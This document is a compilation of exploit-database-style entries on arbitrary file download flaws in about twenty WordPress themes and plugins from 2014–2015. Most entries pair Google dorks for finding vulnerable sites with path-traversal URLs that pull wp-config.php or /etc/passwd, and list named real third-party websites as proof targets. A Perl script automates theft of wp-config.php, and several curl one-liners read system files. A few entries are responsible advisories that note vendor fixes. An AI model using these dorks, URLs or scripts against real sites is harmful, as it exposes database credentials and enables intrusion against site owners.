# Exploit Title : WordPress Plugin KenBurner Slider Arbitrary File Download Vulnerability
# Google Dork: Index of /wp-content/plugins/kbslider
# Date: 2014-08-21
# Exploit Author: MF0x and Daniel Pentest
# Vendor Homepage: http://codecanyon.net/item/responsive-kenburner-slider-jquery-plugin/1633038 
# Version: All
# Tested on: Windows 7 / Google Chrome
 
Description:
The Wordpress Plugin called KenBurner Slider suffers from Arbitrary File Download Vulnerability
 
Proof of Concept (PoC):
http://victim/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
 
# Discovered by: MF0x and Daniel Pentest             
 
# Website: http://www.null-source.blogspot.com.br/
# Email: daniel@analistadesistema.net
# Twitter: https://twitter.com/danielpentest
# YouTube: https://www.youtube.com/danielpentest
# GitHub: https://github.com/danielpentest
 
# Twitter: https://twitter.com/danielpentest
# Pastebin: http://pastebin.com/u/MF0x_

# WordPress Ultimate Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://www.techerhut.com/download-x-v1-7-5-the-ultimate-wordpress-theme-themeforest/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of"  +/wp-content/themes/ultimate/ 
# Patch vul : /wp-content/themes/ultimate/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://www.minutemarketingproductions.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://www.perfectsearchmedia.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
# WordPress IncredibleWP Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/
# Patch vul : /wp-content/themes/IncredibleWP/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://www.rjlwm.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://www.ledixtournai.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
# WordPress Ultimatum Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/ultimatum
# Patch vul : /wp-content/themes/ultimatum/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://gerenscomunicacao.com.br/ngerens/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://fpea.com.br/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
# WordPress Medicate Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/medicate/
# Patch vul : /wp-content/themes/medicate/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://www.fisiorestelo.pt/cms/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://www.chirostnicolas.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
 
# WordPress Centum Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/Centum/
# Patch vul : /wp-content/themes/Centum/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://www.fit8.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://www.tourmasters.co.nz/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
 
# WordPress Avada Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/Avada/
# Patch vul : /wp-content/themes/Avada/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://www.kobeyscozydesertoasis.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://www.cekaservices.fr/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
 
# WordPress Striking Theme & E-Commerce Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763 
# Vendor Support: http://www.strikingsupport.com/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/striking_r/
# Patch vul : /wp-content/themes/striking_r/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://www.tedxissylesmoulineaux.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://www.nockmusique.ca/detente/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
# WordPress Beach Apollo Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: https://www.authenticthemes.com/theme/apollo/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/beach_apollo/
# Patch vul : /wp-content/themes/beach_apollo/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://www.electroejuice.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://www.vz777.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
 
# WordPress CuckooTap Theme & eShop Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/cuckootap/
# Patch vul : /wp-content/themes/cuckootap/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://www.parcferme.me/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://www.quiropraxiazan.com.br/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress Antioch Theme Arbitrary File Download  
Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/antioch
|
|[*] Date : Date: 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://churchthemes.net/themes/antioch
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://gospelrevolutionchurch.com/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|[*]
http://fbch.org/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|[*]
http://fbch.org/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|[*]
http://www.stpeterssouthborough.co.uk/beta/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|[*]
http://kingdomfirerevival.com/main/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|
|-------------------------------------------------------------------------|
|[*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress Authentic Theme Arbitrary File Download  
Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/authentic
|
|[*] Date : Date: 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://www.organizedthemes.com/authentic-theme
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
ttp://www.newlifecenterwv.org/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
|
|[*]
http://www.pillarhoodriver.org/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
|
|
|-------------------------------------------------------------------------|
|[*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress epic theme Arbitrary File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/epic
|
|[*] Date : Date: 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://www.organizedthemes.com/epic
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/epic/includes/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://www.lagunabaptist.org/wp-content/themes/epic/includes/download.php?file=/home/content/46/8992446/html/wp-config.php
|
|[*]
http://doveetown.org/wp-content/themes/epic/includes/download.php?file=/home/content/03/10398303/html/wp-config.php
|
|[*]
http://verdebaptist.com/wp/wp-content/themes/epic/includes/download.php?file=/home/content/44/2981244/html/wp/wp-config.php
|
|[*]
http://kespres.ca/wp-content/themes/epic/includes/download.php?file=/home/content/30/10806230/html/wp-config.php
|
|[*]
http://kimberlywilliamsministries.org/wp-content/themes/epic/includes/download.php?file=/home2/praise11/public_html/wp-config.php
|
|-------------------------------------------------------------------------|
|[*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress urban city Arbitrary File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/urbancity
|
|[*] Date : Date: 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : https://churchthemes.net/themes/urban-city/
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://www.nlbcministries.org/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
www.colonialhills.com/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
http://iccpaix.org/wpblog/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
http://praisecovenant.net/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|

# WordPress Download Manager Plugin - Arbitrary File Download
# CWE: CWE-98
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 25/10/2014
# Vendor Homepage: https://wordpress.org/plugins/download-manager/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl:/plugins/download-manager/
 
# VUL: /views/file_download.php?fname=
 
 or:
 
 /file_download.php?fname=
 
# PoC : 
 
 http://WEBSITE/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php
 
 
# Xploit: Find one website with use /plugins/download-manager/ && ADD TO Link:/views/file_download.php?fname=../../wp-config.php

######################
 
# Exploit Title : Wordpress Ajax Store Locator <= 1.2 Arbitrary File Download
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
 
# Software Link : Premium
 
# Dork Google: inurl:ajax-store-locator
#              index of ajax-store-locator      
 
# Date : 2014-12-06
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
######################
 
# PoC Exploit:
 
http://TARGET/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=[../../nomefile]
 
"download_file" variable is not sanitized.
 
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################

Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-12
Download Site: https://wordpress.org/plugins/wp-instance-rename/
Vendor: Vlajo
Vendor Notified: 2015-06-12
Advisory: http://www.vapid.dhs.org/advisory.php?v=127
Vendor Contact:
Description: WordPress Rename plugin allows you to easily rename the complete WordPress installation. This plugin allows you to rename WordPress database, WordPress directory, change every necessary configuration file, easily from one page.
Vulnerability:
The code in mysqldump_download.php doesn't check that the requested file is within the intended download directory:
 
try{
  $dbname   = $_GET["dbname"];
  $dumpfname = $_GET["dumpfname"];
  $backup_folder = $_GET["backup_folder"];  
}catch (Exception $e){}
 
if(empty($backup_folder)){
  $backup_folder="backup/";
}
echo "$dumpfname";
if (file_exists($dumpfname)) {    
  // zip the dump file  
  $name=$dbname . "_" . date("Y-m-d");  
  $zipfname = $backup_folder.$name.".zip";
  $zip = new ZipArchive();  
  if($zip->open($zipfname,ZIPARCHIVE::CREATE)) 
  {
     $zip->addFile($dumpfname,$dumpfname);
     $zip->close();
  }  
  // read zip file and send it to standard output
  if (file_exists($zipfname)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($zipfname));
    flush();
    readfile($zipfname);
 
CVEID: 2015-4703
OSVDB:
Exploit Code:
  • curl --data "dbname=wp&dumpfname=/etc/passwd&backup_folder=."  http://www.example.com/wp-instance-rename/mysqldump_download.php -o p.zip

# Exploit Title: Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download
# Google Dork: inurl:/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/
# Date: 04/07/2015
# Exploit Author: CrashBandicot @DosPerl
# Vendor Homepage: https://s3bubble.com
# Software Link: https://wordpress.org/plugins/s3bubble-amazon-s3-audio-streaming/
# Version: 2.0
# Tested on: MSWin32
 
 
# Vulnerable File : /wp-content/plugins/..../assets/plugins/ultimate/content/downloader.php
 
<?php 
   header("Content-Type: application/octet-stream");
   header("Content-Disposition: attachment; filename=". $_GET['name']);
   $path = urldecode($_GET['path']);
   if(isset($path))readfile($path);
?>
 
 
# PoC : http://127.0.0.1/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=../../../../../../../wp-config.php
 
 
# Exploit : 
 
 
#!/usr/bin/perl
 
use LWP::UserAgent;
 
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
 
if(@ARGV < 2)
{
die("\n\n[+] usage : perl $0 site.com /path/");
}
 
print q{
       Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download
                           ->CrashBandicot
 
 
};
 
($Target,$path) = @ARGV;
 
if($Target !~ /^(http|https):\/\//)
{
$Target = "http://$Target";
}
 
$xpl = "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php";
my $url = $Target.$path.$xpl;
print "\n [?] Exploiting ...... \n\n";
 
$ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$req = $ua->get($url,":content_file" => "wp-config.php");
 
if ($req->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] File save to name : wp-config.php\n";
}
else
{
die("[!] Exploit Failed !\n");
}
 
_END_

Title: Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-05
Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling
Vendor: https://profiles.wordpress.org/haet/
Vendor Notified: 2015-07-05, fixed in version 2.6.
Vendor Contact: http://wpshopstyling.com
Description: Customize your WP ecommerce store with HTML mail templates, message content, transaction results and PDF invoices with WYSIWYG editor and placeholders.
Vulnerability:
The code in ./wp-ecommerce-shop-styling/includes/download.php doesn't sanitize user input to prevent sensitive system files from being downloaded.
 
 
1 <?php
2 require_once("../../../../wp-admin/admin.php");
3 
4 header('Content-disposition: attachment; filename='.$_GET['filename']);
5 header('Content-type: application/pdf');
6 readfile(HAET_INVOICE_PATH.$_GET['filename']);
7 ?>
 
You'll have to rename the download file via mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd as the filename is set to the download filename with path.
 
CVEID: Requested TBD  
OSVDB: TBD
 
Exploit Code:
  • $ curl http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd

Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-02
Download Site: https://wordpress.org/plugins/wp-swimteam
Vendor: Mike Walsh www.MichaelWalsh.org
Vendor Notified: 2015-07-02, fixed in v1.45beta3
Vendor Contact: Through website
Advisory: http://www.vapid.dhs.org/advisory.php?v=134
Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more.
Vulnerability:
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files:
 
 
 50             $file = urldecode($args['file']) ;
 51             $fh = fopen($file, 'r') or die('Unable to load file, something bad has happened.') ;
 52 
 53             while (!feof($fh))
 54                 $txt .= fread($fh, 1024) ;
 55 
 56             //  Clean up the temporary file - permissions
 57             //  may prevent this from succeedeing so use the '@'
 58             //  to suppress any messages from PHP.
 59 
 60             @unlink($file) ;
 61         }
 62 
 63         $filename = urldecode($args['filename']) ;
 64         $contenttype = urldecode($args['contenttype']) ;
 65 
 66         // Tell browser to expect a text file of some sort (usually txt or csv)
 67 
 68         header(sprintf('Content-Type: application/%s', $contenttype)) ;
 69         header(sprintf('Content-disposition:  attachment; filename=%s', $filename)) ;
 70         print $txt ;
 
CVEID:
OSVDB:
Exploit Code:
  • $ curl "http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"

Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: Image Export plugin can help you selectively download images uploaded by an administrator .
Vulnerability:
The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only.  And line 8 attempts to
unlink the file after being downloaded.  This script could be used to delete files out of the wordpress directory if file permissions allow.
 
      1 <?php
      2 if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
      3         $file = $_GET['file'];
      4 
      5         header( 'Content-Type: application/zip' );
      6         header( 'Content-Disposition: attachment; filename="' . $file . '"' );
      7         readfile( $file );
      8         unlink( $file );
      9         
     10         exit;
     11 }
     12 ?>
CVEID: TBD
Exploit Code:
  • $ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Screen Shots:
Advisory: http://www.vapid.dhs.org/advisory.php?v=135

# Title: Arbitrary File Download in WP Attachment Export Wordpress Plugin
v0.2.3
# Submitter: Nitin Venkatesh
# Product: WP Attachment Export Wordpress Plugin
# Product URL: https://wordpress.org/plugins/wp-attachment-export/
# Vulnerability Type: Arbitrary File Download
# Affected Versions: v0.2.3
# Tested versions: v0.2.3
# Fixed Version: v0.2.4
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1170732/
# Changelog: https://wordpress.org/plugins/wp-attachment-export/changelog/
# CVE Status: None/Unassigned/Fresh
 
## Product Information:
 
WP Attachment Export allows you to export your media library into a
WordPress eXtended RSS or WXR file. You can then use the Tools->Import
function in another WordPress installation to import the media library.
 
## Vulnerability Description:
 
The WP Attachment Export Wordpress Plugin v0.2.3 is susceptible to
Arbitrary File Download wherein anyone(unauthenticated user) could download
the XML data that holds all the details of attachments/posts on a Wordpress
powered site. This includes details of even privately published posts and
password protected posts with their passwords revealed in plain text.
 
## Proof-of-Concept:
 
Download attachment details:
http://localhost/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true
 
Download Wordpress content details:
http://localhost/wp-admin/tools.php?content=&wp-attachment-export-download=true
 
## Solution:
 
Upgrade to v0.2.4 of the plugin.
 
## Disclosure Timeline:
 
2015-05-30 - Mailed report to developer
2015-05-30 - Updated v0.2.4 released
2015-07-14 - Publishing disclosure on FD.
 
## Disclaimer:
 
This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.